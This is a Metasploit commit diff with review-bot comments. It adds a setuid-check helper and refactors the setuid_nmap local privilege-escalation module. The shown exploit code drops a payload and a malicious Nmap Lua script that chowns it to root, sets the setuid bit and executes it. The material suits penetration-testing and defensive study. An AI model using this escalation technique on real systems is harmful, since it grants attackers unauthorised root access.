Land #9446, Post API fix for setuid_nmap

William Vu
2018-01-25 16:00:40 -06:00
committed by Brent Cook
parent 0d98135fcb
commit a87ae41d81
2 changed files with 38 additions and 19 deletions
+31 -11
@@ -59,7 +59,7 @@ module Msf::Post::File
#
# @param path [String] Remote filename to check
def directory?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.directory?
@@ -70,9 +70,9 @@ module Msf::Post::File
f = session.shell_command_token("test -d \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
@@ -93,7 +93,7 @@ module Msf::Post::File
#
# @param path [String] Remote filename to check
def file?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.file?
@@ -107,20 +107,40 @@ module Msf::Post::File
f = session.shell_command_token("test -f \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
alias file_exist? file?
#
# See if +path+ on the remote system is a setuid file
#
# @param path [String] Remote filename to check
def setuid?(path)
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.setuid?
else
if session.platform != 'windows'
f = session.shell_command_token("test -u \"#{path}\" && echo true")
end
return false if f.nil? || f.empty?
return false unless f =~ /true/
true
end
end
#
# Check for existence of +path+ on the remote file system
#
# @param path [String] Remote filename to check
def exist?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return !!(stat)
else
@@ -130,9 +150,9 @@ module Msf::Post::File
f = cmd_exec("test -e \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
@@ -290,7 +310,7 @@ module Msf::Post::File
end
end
return true
true
end
#
@@ -314,7 +334,7 @@ module Msf::Post::File
_write_file_unix_shell(file_name, data, true)
end
end
return true
true
end
#
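Review bot: The new `setuid?` method (the `def setuid?(path)` block in the fourth hunk) is a line-for-line copy of the stat-or-`test` skeleton already used by `directory?` and `file?`; the three differ only in the stat predicate (`directory?`/`file?`/`setuid?`) and the `test` flag (`-d`/`-f`/`-u`), so a fourth copy makes any later fix to the quoting or the `rescue nil` swallow have to be made in every method. I would route `setuid?` through one shared helper as below, and do the same for `directory?` and `file?` in a follow-up; `exist?` is different enough (it calls `cmd_exec` and returns `!!(stat)`) to stay as it is. The YARD block on `setuid?` should also gain `# @return [Boolean] true when the setuid bit is set on +path+`, and the helper must not be placed under a `private` marker, since `Msf::Post::File` is a mixin whose later methods have to stay public. All of these hunks sit inside `module Msf::Post::File`, whose opening and closing lines are outside the diff.
```ruby
def setuid?(path)
  remote_test?(path, '-u', :setuid?)
end

# Shared skeleton for directory?/file?/setuid?: stat via meterpreter,
# otherwise run `test FLAG "path"` through the session shell.
def remote_test?(path, test_flag, stat_predicate)
  if session.type == 'meterpreter'
    stat = session.fs.file.stat(path) rescue nil
    return false unless stat
    return stat.public_send(stat_predicate)
  end
  return false if session.platform == 'windows'
  f = session.shell_command_token("test #{test_flag} \"#{path}\" && echo true")
  return false if f.nil? || f.empty?
  !!(f =~ /true/)
end
```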
+7 -8
@@ -51,12 +51,11 @@ class MetasploitModule < Msf::Exploit::Local
end
def check
stat = session.fs.file.stat(datastore["Nmap"])
if stat and stat.file? and stat.setuid?
vprint_good("#{stat.prettymode} #{datastore["Nmap"]}")
if setuid?(datastore['Nmap'])
vprint_good("#{datastore['Nmap']} is setuid")
return CheckCode::Vulnerable
end
return CheckCode::Safe
CheckCode::Safe
end
def exploit
@@ -69,16 +68,16 @@ class MetasploitModule < Msf::Exploit::Local
write_file(exe_file, generate_payload_exe)
evil_lua = %Q{
os.execute("chown root:root #{exe_file}");
os.execute("chmod 6777 #{exe_file}");
os.execute("chmod 6700 #{exe_file}");
os.execute("#{exe_file} &");
os.execute("rm #{exe_file}");
os.execute("rm -f #{exe_file}");
}
end
lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
print_status("Dropping lua #{lua_file}")
write_file(lua_file, evil_lua)
print_status("running")
print_status("Running #{lua_file} with Nmap")
scriptname = lua_file
if (lua_file[0,1] == "/")
@@ -91,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
# Versions before 4.75 (August 2008) will not run scripts without a port scan
cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
ensure
cmd_exec "rm -f #{lua_file} #{exe_file}"
rm_f(lua_file, exe_file)
end
end
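Review bot: The rewritten `check` in the first hunk drops the `stat.file?` requirement that the replaced condition `stat and stat.file? and stat.setuid?` carried, so a path whose setuid bit is set but which is not a regular file now reports `CheckCode::Vulnerable` even though the later `exploit` can only run it as an Nmap binary. The `Msf::Post::File` API already has `file?`, so the check can keep both conditions: `if file?(datastore['Nmap']) && setuid?(datastore['Nmap'])`. The mode string printed by the old `vprint_good` (`stat.prettymode`) is also gone; if that detail is useful to operators it would have to be re-added from a stat call, since `setuid?` only returns a boolean. `def exploit` begins at the end of the first hunk and its body continues outside the diff.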